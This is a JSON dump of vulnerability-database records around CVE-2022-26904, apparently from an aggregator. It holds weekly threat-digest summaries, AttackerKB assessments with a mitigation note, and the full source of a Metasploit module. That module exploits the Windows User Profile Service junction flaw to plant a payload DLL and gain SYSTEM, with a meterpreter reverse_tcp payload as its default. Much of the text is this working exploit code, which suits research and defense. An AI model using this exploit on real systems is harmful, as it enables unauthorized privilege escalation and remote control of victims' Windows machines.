Advisories: Microsoft\u2019s privilege escalation vulnerability that refuses to go away Google Chrome\u2019s second zero-day in 2022 Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities AvosLocker Ransomware group has targeted 50+ Organizations Worldwide North Korean state-sponsored threat actor Lazarus Group exploiting Chrome Zero-day vulnerability LAPSUS$ \u2013 New extortion group involved in the breach against Nvidia, Microsoft, Okta and Samsung DarkHotel APT group targeting the Hospitality Industry in China New Threat Actor using Serpent Backdoor attacking French Entities Muhstik botnet adds another vulnerability exploit to its arsenal", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T13:56:10", "type": "hivepro", "title": "Weekly Threat Digest: 21 \u2013 27 March 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34484", "CVE-2021-34523", "CVE-2022-0543", "CVE-2022-0609", "CVE-2022-1096", "CVE-2022-21919"], "modified": "2022-03-29T13:56:10", "id": 
"HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "href": "https://www.hivepro.com/weekly-threat-digest-21-27-march-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-21T07:30:07", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 765 14 1 2 6 25 The third week of April 2022 witnessed a huge spike in the discovery of 765 vulnerabilities, out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, there were 5 zero-days, 9 of them are undergoing analysis and 2 other vulnerabilities about which the National Vulnerability Database (NVD) is awaiting analysis, while 1 was not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. Further, we also observed a Threat Actor group being highly active in the last week. OldGremlin, a Russian threat actor group popular for financial crime and gain, was observed targeting Russian agencies. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. 
Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-24521* CVE-2022-26904* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 CVE-2022-1364* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-22954* CVE-2022-22955 CVE-2022-22956 CVE-2022-22957 CVE-2022-22958 CVE-2022-22959 CVE-2022-22960* CVE-2022-22961 https://kb.vmware.com/s/article/88099 CVE-2018-6882 https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 CVE-2022-25165 CVE-2022-25166 https://aws.amazon.com/vpn/client-vpn-download/ *zero-day vulnerability Active Actors: Icon Name Origin Motive OldGremlin Russia Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0011: Command and Control T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1555: Credentials from Password Stores T1071: Application Layer Protocol T1592.001: Hardware T1583.002: DNS Server T1566: Phishing T1059.007: JavaScript T1068: Exploitation for Privilege Escalation T1027: Obfuscated Files or Information T1555.004: Windows Credential Manager T1071.004: DNS T1592.002: Software T1583.001: Domains T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1071.001: Web Protocols T1590: Gather Victim Network Information T1587: Develop Capabilities T1566.002: Spearphishing Link T1204: User Execution T1132: Data Encoding T1590.005: IP Addresses T1587.001: Malware T1204.002: Malicious File T1132.001: Standard Encoding T1585: Establish Accounts T1204.001: Malicious Link T1568: Dynamic Resolution T1585.002: Email Accounts T1568.002: Domain Generation 
Algorithms T1588: Obtain Capabilities T1573: Encrypted Channel T1588.006: Vulnerabilities T1573.001: Symmetric Cryptography T1572: Protocol Tunneling Threat Advisories: Two actively exploited vulnerabilities affect multiple VMware products Google Chrome issues an emergency update to address the third zero-day of year 2022 Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities Old Zimbra vulnerability used to target Ukrainian Government Organizations Two Vulnerabilities discovered in AWS Client VPN OldGremlin, a threat actor targeting Russian organizations with phishing emails since 2020", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T04:59:07", "type": "hivepro", "title": "Weekly Threat Digest: 11 \u2013 17 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6882", "CVE-2022-1364", "CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961", "CVE-2022-24521", "CVE-2022-25165", "CVE-2022-25166", "CVE-2022-26904"], "modified": "2022-04-21T04:59:07", "id": 
"HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D", "href": "https://www.hivepro.com/weekly-threat-digest-11-17-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-05-27T15:11:57", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also correlate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. 
Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-07T15:48:08", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include 
Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also correlate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. 
Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. 
Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. 
Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= 
Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build 
detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! 
Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n 
print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n 
narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:35:15", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 
"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:34:50", "description": "Windows User Profile Service Elevation of Privilege Vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. 
This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. 
They must also have a profile under `C:\\Users` for the exploit to function in its current state. There have been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-15T00:00:00", "id": 
